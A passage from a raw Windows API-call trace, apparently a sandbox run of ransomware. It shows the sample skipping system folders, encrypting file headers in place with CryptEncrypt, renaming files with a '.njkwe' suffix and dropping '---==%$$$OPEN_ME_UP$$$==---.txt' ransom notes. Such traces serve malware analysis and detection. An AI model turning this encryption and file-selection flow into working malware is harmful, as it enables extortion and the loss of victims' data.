0xc486f0 [0067.904] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sXlE5}.njkwe") returned 132 [0067.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0067.905] GetProcessHeap () returned 0xbe0000 [0067.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.905] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e74e13, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96e74e13, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38480a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0067.905] FindClose (in: hFindFile=0xc1a3a0 | out: hFindFile=0xc1a3a0) returned 1 [0067.905] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 118 [0067.905] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\x-none.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0067.906] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0067.907] CloseHandle (hObject=0x434) returned 1 [0067.907] GetProcessHeap () returned 0xbe0000 [0067.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0067.907] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d43d48, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ec13b1, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0067.907] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0067.907] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 108 [0067.907] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0067.907] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0067.912] CloseHandle (hObject=0x430) returned 1 [0067.912] GetProcessHeap () returned 0xbe0000 [0067.912] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0067.912] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f016ef, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8300c739, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8300c739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", cAlternateFileName="201EB7~1")) returned 1 [0067.912] lstrcmpiW (lpString1="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2="Windows") returned -1 [0067.912] lstrcmpiW (lpString1="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2="$Recycle.bin") returned 1 [0067.912] lstrcmpiW (lpString1="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2="System Volume Information") returned -1 [0067.912] lstrcmpiW (lpString1="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2="Program Files") returned -1 [0067.912] lstrcmpiW (lpString1="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2="Program Files (x86)") returned -1 [0067.912] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6") returned 76 [0067.912] lstrcmpW (lpString1="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2=".") returned 1 [0067.912] lstrcmpW (lpString1="201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2="..") returned 1 [0067.913] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.913] GetProcessHeap () returned 0xbe0000 [0067.913] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0067.913] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\*") returned 78 [0067.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f016ef, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8300c739, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8300c739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d20 [0067.988] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.988] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.988] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.988] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.988] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.988] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\.") returned 78 [0067.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.989] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f016ef, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8300c739, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8300c739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.989] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.989] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.989] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.989] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.989] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.989] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\..") returned 79 [0067.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.989] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f016ef, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82f9a029, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x82f9a029, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0067.989] lstrcmpiW (lpString1="en-us.16", lpString2="Windows") returned -1 [0067.989] lstrcmpiW (lpString1="en-us.16", lpString2="$Recycle.bin") returned 1 [0067.989] lstrcmpiW (lpString1="en-us.16", lpString2="System Volume Information") returned -1 [0067.989] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files") returned -1 [0067.989] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files (x86)") returned -1 [0067.989] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16") returned 85 [0067.989] lstrcmpW (lpString1="en-us.16", lpString2=".") returned 1 [0067.989] lstrcmpW (lpString1="en-us.16", lpString2="..") returned 1 [0067.989] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.989] GetProcessHeap () returned 0xbe0000 [0067.989] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0067.989] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\*") returned 87 [0067.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f016ef, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82f9a029, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x82f9a029, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ee0 [0067.992] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.992] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.992] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.992] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.992] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.992] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\.") returned 87 [0067.992] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.992] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f016ef, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82f9a029, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x82f9a029, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.992] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.992] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.992] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.992] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.992] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.992] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\..") returned 88 [0067.993] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.993] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.993] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f73dd4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82f73dd4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd7b21800, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x564f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0067.993] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Windows") returned -1 [0067.993] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="$Recycle.bin") returned 1 [0067.993] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="System Volume Information") returned -1 [0067.993] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files") returned -1 [0067.993] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files (x86)") returned -1 [0067.993] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\MasterDescriptor.en-us.xml") returned 112 [0067.993] StrStrIW (lpFirst="MasterDescriptor.en-us.xml", lpSrch=".njkwe") returned 0x0 [0067.993] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.993] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="taridd") returned -1 [0067.993] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\MasterDescriptor.en-u", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.993] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.993] GetTickCount () returned 0x1151634 [0067.993] GetTickCount () returned 0x1151634 [0067.993] GetTickCount () returned 0x1151634 [0067.993] GetTickCount () returned 0x1151634 [0067.993] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.994] GetProcessHeap () returned 0xbe0000 [0067.994] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.994] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.995] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.995] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.996] GetProcessHeap () returned 0xbe0000 [0067.996] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.996] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.996] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.996] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.996] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.996] CloseHandle (hObject=0x438) returned 1 [0067.997] GetProcessHeap () returned 0xbe0000 [0067.997] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.997] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe") returned 132 [0067.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\masterdescriptor.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0067.997] GetProcessHeap () returned 0xbe0000 [0067.997] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.997] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f73dd4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82f73dd4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfe714e00, ftLastWriteTime.dwHighDateTime=0x1d0d7e7, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s641033.hash", cAlternateFileName="S64103~1.HAS")) returned 1 [0067.997] lstrcmpiW (lpString1="s641033.hash", lpString2="Windows") returned -1 [0067.997] lstrcmpiW (lpString1="s641033.hash", lpString2="$Recycle.bin") returned 1 [0067.997] lstrcmpiW (lpString1="s641033.hash", lpString2="System Volume Information") returned -1 [0067.997] lstrcmpiW (lpString1="s641033.hash", lpString2="Program Files") returned 1 [0067.997] lstrcmpiW (lpString1="s641033.hash", lpString2="Program Files (x86)") returned 1 [0067.997] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\s641033.hash") returned 98 [0067.997] StrStrIW (lpFirst="s641033.hash", lpSrch=".njkwe") returned 0x0 [0067.997] lstrcmpW (lpString1="s641033.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.997] lstrcmpW (lpString1="s641033.hash", lpString2="taridd") returned -1 [0067.997] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\s641033.hash", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.998] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.998] GetTickCount () returned 0x1151634 [0067.998] GetTickCount () returned 0x1151634 [0067.998] GetTickCount () returned 0x1151634 [0067.998] GetTickCount () returned 0x1151634 [0067.998] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.998] GetProcessHeap () returned 0xbe0000 [0067.998] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.998] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.999] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.999] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.999] GetProcessHeap () returned 0xbe0000 [0067.999] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.999] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.999] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0068.000] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0068.000] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0068.000] CloseHandle (hObject=0x438) returned 1 [0068.000] GetProcessHeap () returned 0xbe0000 [0068.000] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0068.000] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\s641033.hash_r00t_{3sXlE5}.njkwe") returned 118 [0068.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\s641033.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\s641033.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\s641033.hash_r00t_{3sxle5}.njkwe")) returned 1 [0068.001] GetProcessHeap () returned 0xbe0000 [0068.001] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0068.001] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f73dd4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82f73dd4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcc39700, 